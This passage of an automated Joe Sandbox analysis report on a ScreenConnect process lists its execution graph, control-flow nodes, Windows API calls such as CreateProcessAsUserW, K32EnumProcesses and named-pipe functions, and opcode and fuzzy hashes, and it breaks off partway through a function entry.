                                                                                                                                                                                                                                                        Signature Coverage:2.9%
                                                                                                                                                                                                                                                        Total number of Nodes:105
                                                                                                                                                                                                                                                        Total number of Limit Nodes:7
                                                                                                                                                                                                                                                        execution_graph 26894 53629d0 26895 5362a23 CreateProcessAsUserW 26894->26895 26897 5362ab4 26895->26897 26902 5360040 26903 5360071 26902->26903 26912 5361030 26903->26912 26918 5361021 26903->26918 26904 5360a4e 26905 5360b07 26904->26905 26941 5365482 26904->26941 26906 53600c7 26924 5363f51 26906->26924 26933 5363fb1 26906->26933 26913 5361054 26912->26913 26915 536109c 26913->26915 26945 5353268 26913->26945 26953 5353258 26913->26953 26914 536112c 26915->26906 26919 5361030 26918->26919 26921 536109c 26919->26921 26922 5353268 4 API calls 26919->26922 26923 5353258 4 API calls 26919->26923 26920 536112c 26921->26906 26922->26920 26923->26920 26925 5363f5a 26924->26925 26926 5363fb4 26924->26926 26925->26904 26928 5363ff7 26926->26928 26997 5364120 26926->26997 27001 5364110 26926->27001 26927 5364020 26931 5364120 WaitNamedPipeW 26927->26931 26932 5364110 WaitNamedPipeW 26927->26932 26928->26904 26931->26928 26932->26928 26934 5363fde 26933->26934 26936 5363ff7 26934->26936 26937 5364120 WaitNamedPipeW 26934->26937 26938 5364110 WaitNamedPipeW 26934->26938 26935 5364020 26939 5364120 WaitNamedPipeW 26935->26939 26940 5364110 WaitNamedPipeW 26935->26940 26936->26904 26937->26935 26938->26935 26939->26936 26940->26936 27009 5363ea8 CloseHandle 26941->27009 27011 5363ea1 26941->27011 26942 536549b 26942->26905 26947 535329c 26945->26947 26948 535328c 26945->26948 26946 5353295 26946->26914 26961 53533df 26947->26961 26968 53533e8 26947->26968 26948->26946 26949 53533df 4 API calls 26948->26949 26950 53533e8 4 API calls 26948->26950 26949->26948 26950->26948 26954 5353268 26953->26954 26955 535328c 26954->26955 26959 53533df 4 API calls 26954->26959 26960 53533e8 4 API calls 26954->26960 26956 5353295 26955->26956 26957 53533df 4 API calls 26955->26957 26958 53533e8 4 API calls 26955->26958 26956->26914 26957->26955 26958->26955 26959->26955 26960->26955 26964 535340d 26961->26964 26965 53533e7 26961->26965 26962 5353416 26962->26948 26964->26962 26989 5352808 26964->26989 26965->26964 26975 5353568 26965->26975 26982 5353558 26965->26982 26969 535340d 26968->26969 26971 535341d 26968->26971 26970 5353416 26969->26970 26972 5352808 ProcessIdToSessionId 26969->26972 26970->26948 26973 5353568 2 API calls 26971->26973 26974 5353558 2 API calls 26971->26974 26972->26969 26973->26969 26974->26969 26976 5353592 26975->26976 26978 535357f 26975->26978 26976->26978 26993 5352814 26976->26993 26977 5353588 26977->26964 26978->26977 26979 53536fa K32EnumProcesses 26978->26979 26981 5353732 26979->26981 26981->26964 26983 535357f 26982->26983 26988 5353592 26982->26988 26984 5353588 26983->26984 26985 53536fa K32EnumProcesses 26983->26985 26984->26964 26987 5353732 26985->26987 26986 5352814 K32EnumProcesses 26986->26988 26987->26964 26988->26983 26988->26986 26990 53537a0 ProcessIdToSessionId 26989->26990 26992 5353813 26990->26992 26992->26964 26994 53536a8 K32EnumProcesses 26993->26994 26996 5353732 26994->26996 26996->26976 26999 536412d 26997->26999 27000 5364164 26999->27000 27005 536382c 26999->27005 27000->26927 27004 5364120 27001->27004 27002 536382c WaitNamedPipeW 27002->27004 27003 5364164 27003->26927 27004->27002 27004->27003 27006 5364188 WaitNamedPipeW 27005->27006 27008 5364204 27006->27008 27008->26999 27010 5363f12 27009->27010 27010->26942 27012 5363ea8 CloseHandle 27011->27012 27013 5363f12 27012->27013 27013->26942 26898 5364c58 26900 5364cb6 26898->26900 26899 5364d2b CreateFileA 26901 5364d8d 26899->26901 26900->26899 26900->26900 27014 5360cc8 27018 5360cf5 27014->27018 27021 5360d00 27014->27021 27019 5360d54 ConnectNamedPipe 27018->27019 27020 5360d90 27019->27020 27022 5360d54 ConnectNamedPipe 27021->27022 27023 5360d90 27022->27023

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 053629D0 Relevance: 1.6, APIs: 1, Instructions: 93processCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 671 53629d0-5362a21 672 5362a23-5362a29 671->672 673 5362a2c-5362a30 671->673 672->673 674 5362a32-5362a35 673->674 675 5362a38-5362a4d 673->675 674->675 676 5362a4f-5362a58 675->676 677 5362a5b-5362ab2 CreateProcessAsUserW 675->677 676->677 678 5362ab4-5362aba 677->678 679 5362abb-5362ae3 677->679 678->679
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05362A9F
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300571010.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5360000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateProcessUser
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2217836671-0
                                                                                                                                                                                                                                                        • Opcode ID: 3d698bc6e3a050c17aaf98be8b0f7d5f0fc1358b6190c0ab09b7bb993dd1a3b6
                                                                                                                                                                                                                                                        • Instruction ID: a8c211fb6e1939bef80ccb409d480197399deebf19411154f081d056c9f244c9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d698bc6e3a050c17aaf98be8b0f7d5f0fc1358b6190c0ab09b7bb993dd1a3b6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D041137A900209DFCF11CFA9C884ADEBBF6FF48310F15852AE918A7250D775A955CF90
                                                                                                                                                                                                                                                        Function 05364C4D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 146 5364c4d-5364cb4 147 5364cb6-5364cdb 146->147 148 5364d08-5364d8b CreateFileA 146->148 147->148 151 5364cdd-5364cdf 147->151 155 5364d94-5364dd2 148->155 156 5364d8d-5364d93 148->156 153 5364d02-5364d05 151->153 154 5364ce1-5364ceb 151->154 153->148 157 5364cef-5364cfe 154->157 158 5364ced 154->158 163 5364dd4-5364dd8 155->163 164 5364de2 155->164 156->155 157->157 159 5364d00 157->159 158->157 159->153 163->164 165 5364dda 163->165 166 5364de3 164->166 165->164 166->166
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 05364D75
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300571010.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5360000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                        • String ID: 4L]q
                                                                                                                                                                                                                                                        • API String ID: 823142352-261793533
                                                                                                                                                                                                                                                        • Opcode ID: 0a9ccc4b149e7b747c9657390ceb332163c9a012d954b3f2d97732aa84e2319d
                                                                                                                                                                                                                                                        • Instruction ID: 6a19164a9c4ce16e3b4a3b238c566dd8d5eb9ac1aa7d07333f8c5223a5f3d98b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a9ccc4b149e7b747c9657390ceb332163c9a012d954b3f2d97732aa84e2319d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F5135B1D002599FDB10CFA9C984B9DBBF2FB48704F248129E809AB355D7B99845CB91
                                                                                                                                                                                                                                                        Function 05364C58 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 116fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 167 5364c58-5364cb4 168 5364cb6-5364cdb 167->168 169 5364d08-5364d8b CreateFileA 167->169 168->169 172 5364cdd-5364cdf 168->172 176 5364d94-5364dd2 169->176 177 5364d8d-5364d93 169->177 174 5364d02-5364d05 172->174 175 5364ce1-5364ceb 172->175 174->169 178 5364cef-5364cfe 175->178 179 5364ced 175->179 184 5364dd4-5364dd8 176->184 185 5364de2 176->185 177->176 178->178 180 5364d00 178->180 179->178 180->174 184->185 186 5364dda 184->186 187 5364de3 185->187 186->185 187->187
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 05364D75
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300571010.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5360000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                        • String ID: 4L]q
                                                                                                                                                                                                                                                        • API String ID: 823142352-261793533
                                                                                                                                                                                                                                                        • Opcode ID: 579fc7a1c1906296096d27f49eced26c63f2d6aa830449707853ff1be20e18f4
                                                                                                                                                                                                                                                        • Instruction ID: 71be4dee07d721c09b202309560acdbbefa4ebe73e5c170f5f84c3f3873a64dc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 579fc7a1c1906296096d27f49eced26c63f2d6aa830449707853ff1be20e18f4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F4135B0D003599FDB10CFA9C984B9EBBF2BF48304F24C129E808AB355D7B99845CB91
                                                                                                                                                                                                                                                        Function 00DDC6DB Relevance: 2.7, Strings: 2, Instructions: 247COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 322 ddc6db-ddc726 324 ddc72c-ddc744 322->324 325 ddca57-ddca5e 322->325 328 ddc766-ddc781 324->328 329 ddc746-ddc761 324->329 384 ddc786 call ddcbc0 328->384 385 ddc786 call ddcbb0 328->385 334 ddc80e-ddc823 call ddf950 329->334 337 ddc829-ddc83f call dd5c2c 334->337 338 ddca2b-ddca3e 334->338 335 ddc78c-ddc7d4 388 ddc7d7 call dded38 335->388 389 ddc7d7 call dded28 335->389 390 ddc7d7 call ddecb1 335->390 346 ddc857-ddc880 337->346 347 ddc841-ddc847 337->347 341 ddca45-ddca49 338->341 342 ddca4b 341->342 343 ddca54 341->343 342->343 343->325 346->338 357 ddc886-ddc88c 346->357 349 ddc849 347->349 350 ddc84b-ddc84d 347->350 348 ddc7da-ddc800 355 ddc80b 348->355 356 ddc802 348->356 349->346 350->346 355->334 356->355 358 ddca40 357->358 359 ddc892-ddc8a9 357->359 358->341 359->358 361 ddc8af-ddc8d3 359->361 364 ddca1e-ddca25 361->364 365 ddc8d9-ddc972 call ddaab0 call ddb5a8 361->365 364->338 364->357 365->338 372 ddc978-ddc986 365->372 374 ddc988-ddc9ac 372->374 375 ddc9b1-ddc9f1 call ddfa08 372->375 374->341 381 ddc9fa-ddca1c call dd5c3c 375->381 381->341 384->335 385->335 388->348 389->348 390->348
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: $]q$$]q
                                                                                                                                                                                                                                                        • API String ID: 0-127220927
                                                                                                                                                                                                                                                        • Opcode ID: 4ce5f814c1d82796b053ad066ea511da05ffddf05cb36473b69f5a380f9c67db
                                                                                                                                                                                                                                                        • Instruction ID: 83b3c8815c0e6773f302a9d2a2a58f4c03866efc4783e6f613c0e99d13a446ed
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ce5f814c1d82796b053ad066ea511da05ffddf05cb36473b69f5a380f9c67db
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01A18230E1070ACFCB15EFA8C454AADBBB2FF85300F11956AD405AB365DB749D85CB91
                                                                                                                                                                                                                                                        Function 00DDEF78 Relevance: 2.7, Strings: 2, Instructions: 202COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 439 ddef78-ddef97 440 ddef9d-ddefa6 439->440 441 ddf1c8-ddf1ed 439->441 444 ddefac-ddf010 440->444 445 ddf1f4-ddf233 440->445 441->445 456 ddf03a-ddf043 444->456 457 ddf012-ddf037 444->457 458 ddf048-ddf05e call ddf640 456->458 459 ddf045 456->459 457->456 462 ddf064-ddf066 458->462 459->458 464 ddf068-ddf06d 462->464 465 ddf0c3-ddf0d0 462->465 466 ddf06f-ddf0a4 464->466 467 ddf0a9-ddf0bc 464->467 470 ddf0dd 465->470 471 ddf0d2-ddf0db 465->471 478 ddf168-ddf17c 466->478 467->465 473 ddf0e2-ddf0e4 470->473 471->473 476 ddf119-ddf161 473->476 477 ddf0e6-ddf112 473->477 476->478 477->476 483 ddf17e 478->483 484 ddf186-ddf18b 478->484 483->484 486 ddf18d 484->486 487 ddf195-ddf19a 484->487 486->487 488 ddf19c-ddf1aa call dde9dc call dde9f4 487->488 489 ddf1af 487->489 488->489 489->441
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: (&]q$(aq
                                                                                                                                                                                                                                                        • API String ID: 0-1602648543
                                                                                                                                                                                                                                                        • Opcode ID: 9ea0e64e9987ab46cc2fbeddd286ffdaeb104556e0a38304118680398b1db2b6
                                                                                                                                                                                                                                                        • Instruction ID: 85a3bde84825433f87ff3e67930cbf3943a7b44d880d3822d45cbbd5ca2f78cd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9ea0e64e9987ab46cc2fbeddd286ffdaeb104556e0a38304118680398b1db2b6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5617131F002198FDB55EFB9C8507AEBAB2AFC4740F248529D406AB385DF34AD46C7A5
                                                                                                                                                                                                                                                        Function 00DD5DC0 Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 539 dd5dc0-dd5dc8 541 dd5dca-dd5dd3 539->541 542 dd5e16-dd5e4f call dd0420 539->542 541->542 550 dd5fda-dd5fe1 542->550 551 dd5e55-dd5e60 542->551 551->550 553 dd5e66-dd5e7d call dd59e0 551->553 556 dd5e7f-dd5e95 553->556 557 dd5ec0-dd5ecf 553->557 562 dd5e9e-dd5ebe 556->562 563 dd5e97 556->563 560 dd5edf-dd5ee8 557->560 561 dd5ed1-dd5edd 557->561 564 dd5eea-dd5f10 560->564 565 dd5f12-dd5f17 560->565 561->560 562->557 563->562 564->565 568 dd5f1f-dd5f35 565->568 575 dd5fa5-dd5fbe 568->575 576 dd5f37-dd5f5e 568->576 579 dd5fc9-dd5fca 575->579 580 dd5fc0-dd5fc3 575->580 585 dd5f98-dd5fa3 576->585 586 dd5f60-dd5f87 576->586 579->550 580->579 585->575 585->576 586->585 591 dd5f89-dd5f96 586->591 591->575
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: `pq$nCuq
                                                                                                                                                                                                                                                        • API String ID: 0-3819717929
                                                                                                                                                                                                                                                        • Opcode ID: 4169becd1002b00f8939f907ffbdde559e488c4cd3495eab27f64f73c37022d3
                                                                                                                                                                                                                                                        • Instruction ID: a6bfe075bcb6215e3067a1bac6096dea430581a9b06e3d86fce95148962a1668
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4169becd1002b00f8939f907ffbdde559e488c4cd3495eab27f64f73c37022d3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3416D307107068FC755EB38E954A6E77E2AF88304B24847AE406CB369EF74DD06CBA1
                                                                                                                                                                                                                                                        Function 00DD4C61 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 593 dd4c61-dd4cb3 598 dd4cb5-dd4cc4 call dd4830 593->598 599 dd4d02-dd4d08 593->599 602 dd4d09-dd4dd8 598->602 603 dd4cc6-dd4ccb 598->603 609 dd4dda-dd4de0 602->609 610 dd4de1-dd4e24 602->610 616 dd4cce call dd4ef8 603->616 617 dd4cce call dd4eeb 603->617 604 dd4cd4 604->599 609->610 614 dd4e2b-dd4e32 610->614 615 dd4e26 610->615 615->614 616->604 617->604
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: `Q]q$`Q]q
                                                                                                                                                                                                                                                        • API String ID: 0-3952371890
                                                                                                                                                                                                                                                        • Opcode ID: 70dbf4b3800f42f0784792b6b02814405a719e35be739b2322cedecf2913ecf7
                                                                                                                                                                                                                                                        • Instruction ID: 62b70ce853eab44e6534d18dcdd719acafd5f878cf0464e1ee2d9cf3c0b5f3c9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 70dbf4b3800f42f0784792b6b02814405a719e35be739b2322cedecf2913ecf7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5741AE70A003599FDB60DFA5D844BAABBB9FB45310F0081AAD508E7381DB755E49CFA2
                                                                                                                                                                                                                                                        Function 00DD5410 Relevance: 2.5, Strings: 2, Instructions: 16COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 618 dd5410-dd541b 620 dd5421-dd5423 618->620 621 dd543b-dd543c 620->621 622 dd5425-dd542b 620->622 623 dd542d 622->623 624 dd542f-dd5431 622->624 623->621 624->621
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: $]q$$]q
                                                                                                                                                                                                                                                        • API String ID: 0-127220927
                                                                                                                                                                                                                                                        • Opcode ID: ee13f6f41290e2c83a2a1c7aee4930154159c95a12c42a5eff8a34f5be84cb70
                                                                                                                                                                                                                                                        • Instruction ID: ef0785f64bbdf2d0dae1997ba4eb36587eb68ef44873eb658bcba4e7b98a86fa
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee13f6f41290e2c83a2a1c7aee4930154159c95a12c42a5eff8a34f5be84cb70
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7BD09E3078060C8F9728DE69E994D1133F9BF54B113A544A6D9458B33ADE31EC82C766
                                                                                                                                                                                                                                                        Function 05353568 Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 625 5353568-535357d 626 5353592-5353599 625->626 627 535357f-5353582 625->627 630 535359e-53535e2 call 5352814 626->630 628 535364c-5353660 627->628 629 5353588-5353591 627->629 631 5353626-535362f 628->631 632 5353662 628->632 650 53535e7-53535ec 630->650 634 5353631-535364b 631->634 635 535368c-53536a0 631->635 633 535366e-5353677 632->633 639 53536a2-53536ec 635->639 640 53536ed-53536ee 635->640 639->640 642 53536f0-53536f8 640->642 643 53536fa-5353730 K32EnumProcesses 640->643 642->643 644 5353732-5353738 643->644 645 5353739-5353761 643->645 644->645 651 53535f2-53535f5 650->651 652 5353678-5353685 650->652 653 5353664-5353669 651->653 654 53535f7-5353624 651->654 652->635 653->630 654->631 654->633
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300491536.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 996ddccd777653c277286ef1a28a0447b99c528cd079fd65cf0621a093660ccb
                                                                                                                                                                                                                                                        • Instruction ID: 3835defd4f32026b70c72f4762706f06ffb10eb34a8f0aaf7e19ffa9b1ee9ff1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 996ddccd777653c277286ef1a28a0447b99c528cd079fd65cf0621a093660ccb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE519F71A006058FCB24CFA9D884AAEBBF5FF88320F10892ED45AD3750D774E945CBA1
                                                                                                                                                                                                                                                        Function 053629C9 Relevance: 1.6, APIs: 1, Instructions: 95processCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 659 53629c9-5362a21 661 5362a23-5362a29 659->661 662 5362a2c-5362a30 659->662 661->662 663 5362a32-5362a35 662->663 664 5362a38-5362a4d 662->664 663->664 665 5362a4f-5362a58 664->665 666 5362a5b-5362ab2 CreateProcessAsUserW 664->666 665->666 667 5362ab4-5362aba 666->667 668 5362abb-5362ae3 666->668 667->668
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05362A9F
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300571010.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5360000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateProcessUser
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2217836671-0
                                                                                                                                                                                                                                                        • Opcode ID: e760b1c8459195e8257d41dee6c7c037fd356e2415a8acd96c28d5a0b38e86d7
                                                                                                                                                                                                                                                        • Instruction ID: f2b3dd622a615b8fb54d09ccb7b7b221d566e5fd04b508adf5459e645d2cfdcd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e760b1c8459195e8257d41dee6c7c037fd356e2415a8acd96c28d5a0b38e86d7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B41137A900209EFCF11CFA9C884ADEBBF6FF48310F15852AE918A7250D775A955CF90
                                                                                                                                                                                                                                                        Function 05353771 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 053537FE
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300491536.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ProcessSession
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3779259828-0
                                                                                                                                                                                                                                                        • Opcode ID: 2975b4317709e20ac37715725a4260b548de037071779401d6961a389d1084a8
                                                                                                                                                                                                                                                        • Instruction ID: a3bf574cdea224f9dc70b59bb7d19e9c8de88fe49a0a4d7a9caa971a979c28af
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2975b4317709e20ac37715725a4260b548de037071779401d6961a389d1084a8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 632145B1C043499FCB11CFAAC444ADEBFF4BB49320F15846AD859A7251D738A649CBA1
                                                                                                                                                                                                                                                        Function 00DDFB40 Relevance: 1.6, Strings: 1, Instructions: 316COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: d
                                                                                                                                                                                                                                                        • API String ID: 0-2564639436
                                                                                                                                                                                                                                                        • Opcode ID: 03129e6beb3d2837d13c63ec250f8a889dd7365a70ce091362e23103ed448b97
                                                                                                                                                                                                                                                        • Instruction ID: db7f6efd58ef8c3f8174c95192c45cb0540c3a3ed8cc8a831734ee14c2c7804d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 03129e6beb3d2837d13c63ec250f8a889dd7365a70ce091362e23103ed448b97
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7D16F74A40705CFCB05DF68D884A99B7B6FF89310B158669E909EB366DB30EC85CF90
                                                                                                                                                                                                                                                        Function 05360CF5 Relevance: 1.6, APIs: 1, Instructions: 66pipeCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • ConnectNamedPipe.KERNEL32(00000000), ref: 05360D78
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300571010.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5360000_ScreenConnect.jbxd
